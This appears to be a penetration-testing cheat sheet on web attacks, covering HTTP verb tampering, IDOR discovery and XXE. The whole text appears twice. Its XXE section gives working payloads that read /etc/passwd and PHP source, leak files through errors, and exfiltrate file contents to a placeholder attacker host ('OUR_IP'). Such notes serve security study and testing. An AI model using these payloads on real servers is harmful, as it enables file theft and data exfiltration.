Web Attacks

HTTP Verb Tampering

HTTP Method

HEAD
PUT
DELETE
OPTIONS
PATCH

Command

Description

-X OPTIONS

Set HTTP Method with Curl

IDOR

Identify IDORS

In URL parameters & APIs
In AJAX Calls
By understanding reference hashing/encoding
By comparing user roles

Command

Description

md5sum

MD5 hash a string

base64

Base64 encode a string

XXE

Code

Description

<!ENTITY xxe SYSTEM "http://localhost/email.dtd">

Define External Entity to a URL

<!ENTITY xxe SYSTEM "file:///etc/passwd">

Define External Entity to a file path

<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php">

Read PHP source code with base64 encode filter

<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">

Reading a file through a PHP error

<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">

Reading a file OOB exfiltration

PreviousCommand Injection

Last updated 1 year ago

Web Attacks

HTTP Verb Tampering

HTTP Method

HEAD
PUT
DELETE
OPTIONS
PATCH

Command

Description

-X OPTIONS

Set HTTP Method with Curl

IDOR

Identify IDORS

In URL parameters & APIs
In AJAX Calls
By understanding reference hashing/encoding
By comparing user roles

Command

Description

md5sum

MD5 hash a string

base64

Base64 encode a string

XXE

Code

Description

<!ENTITY xxe SYSTEM "http://localhost/email.dtd">

Define External Entity to a URL

<!ENTITY xxe SYSTEM "file:///etc/passwd">

Define External Entity to a file path

<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php">

Read PHP source code with base64 encode filter

<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">

Reading a file through a PHP error

<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">

Reading a file OOB exfiltration

PreviousCommand Injection

Last updated 1 year ago